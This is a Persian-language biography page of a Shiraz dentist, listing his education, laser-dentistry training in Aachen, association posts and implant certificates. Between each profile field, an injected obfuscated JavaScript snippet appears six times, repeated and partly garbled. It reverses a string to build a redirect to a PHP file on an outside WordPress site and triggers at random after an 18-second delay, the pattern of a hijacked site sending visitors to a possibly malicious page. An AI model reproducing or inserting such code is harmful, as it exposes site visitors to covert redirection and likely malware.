بیوگرافی

amir-azmi

 

 

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” width=”215″>

نام: امیر

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” width=”179″>

سال تولد: 1356

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” width=”215″>

نام خانوادگی: عزمی

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” width=”179″>

محل تولد: کازرون

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” width=”215″>

متاهل

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” width=”179″>

ساكن: شيراز

 

 

تحصیلات:
• دیپلم تجربی با معدل 19/28 در سال 1374
• کسب رتبه 219 در آزمون سراسری ورودی دانشگاه های ایران (1375)
• دکترای عمومی دانشکده دندانپزشکی دانشگاه علوم پزشکی شیراز (81-75)
• مستر شیپ (mastership) لیزرهای دندانی از دانشگاه آخن آلمان1390
• دندانپزشک نمونه استان فارس در سال 1389 برگزیده سازمان نظام پزشکی ایران

•متخصص لیزرهای دندانی(MSc)از دانشگاه RWTH آخن آلمان(2012-2015)

نماینده و رابط دانشگاه بن آلمان در رشته های تخصصی و دوره های آموزشی دندانپزشکی در ایران

فعالیت های اجرایی:

• عضو هیات مدیره و دبیر انجمن دندانپزشکی ایران-شعبه فارس(1390 تا کنون)

عضو هیات مدیره کمیته شعب انجمن دندانپزشکی ایران(1394)

• نماینده ورابط انجمن دندانپزشکی ایران در استانهای فارس.بوشهر.کهکیلویه و هرمزگان
• عضو هیات مدیره و نماینده دندانپزشکان در مجمع انجمنهای تخصصی فارس (1389تا کنون)
• شروع به کار در مطب شخصی از سال 1382 تاکنون
• دبیر انجمن اسلامی دانشکده دندانپزشکی دانشگاه علوم پزشکی شیراز (81 – 75)
• مسئول شاخه دانشجویی انجمن دندانپزشکی ایران (81-79)
• مسئول شاخه جوانان انجمن دندانپزشکی ایران (83-82)
• مسئول برگزاری دو دوره کلاس های ایمپلنت در شیراز (89-87)
• مسئول نمایشگاه دومین کنگره کشوری انجمن دندانپزشکان ایران – شاخه فارس (1389)
• مسئول نمایشگاه سومین کنگره کشوری انجمن دندانپزشکان ایران – شاخه فارس (1390)
• دبیر اجرایی چهارمین کنگره کشوری انجمن دندانپزشکان ایران – شاخه فارس (1391)
• مسئول نمایشگاه یازدهمین کنگره بین المللی انجمن ارتودنتیستهای ایران(1392)
• مسئول نمایشگاه پنجاه و سومین کنگره بین المللی انجمن دندانپزشکی ایران(1392)

مسئول نمایشگاه دوازدهمین کنگره بین المللی انجمن ارتودنتیستهای ایران(1393)

دبیر اجرای همایش علمی انجمن دندانپزشکی ایران-شاخه فارس(1393) 
دوره های آموزشی گذرانده شده:
• گذراندن 120 ساعت دوره Implant در جهاد دانشگاهی دانشگاه تهران (2008-2007)
• گذراندن 20 ساعت دوره فلپ های لثه در دانشگاه تهران (2006)
• گذراندن یک سال دوره مستر شیپی لیزر در دانشگاه RWTH آخن آلمان

فعالیت های علمی:

استاد و مدرس دوره های آموزش لیزر های دندانی انجمن دندانپزشکی ایران -شعبه فارس

مدرس دوره های WCLI(انستیتو جهانی لیزر) در شیراز

• اخذ دیپلم Implant از شرکت Astra سوئد (2008)
• اخذ certificate ایمپلنت از شرکت Zimmer آمریکا (2008)
• اخذ certificate ایمپلنت از شرکت Implant Direct آمریکا (2008)
• اخذ certificate ایمپلنت از شرکت BioHORIZONS آمریکا (2009)
• اخذ certificate ایمپلنت از شرکت TBR فرانسه (2008)
• اخذ certificate ایمپلنت از شرکت Euroteknika فرانسه (2008)
• اخذ certificate ایمپلنت از شرکت ITI سوئیس (2008)
• اخذ certificate ایمپلنت از شرکت DIO کره (2009)
• اخذ certificate ایمنی لیزر(Laser Safety Officer) آلمان 2010
• اخذ certificate زیبایی از دانشگاه ICDE آلمان2011
• سردبیر نشریه علمی – صنفی عصر دندانپزشک 83-82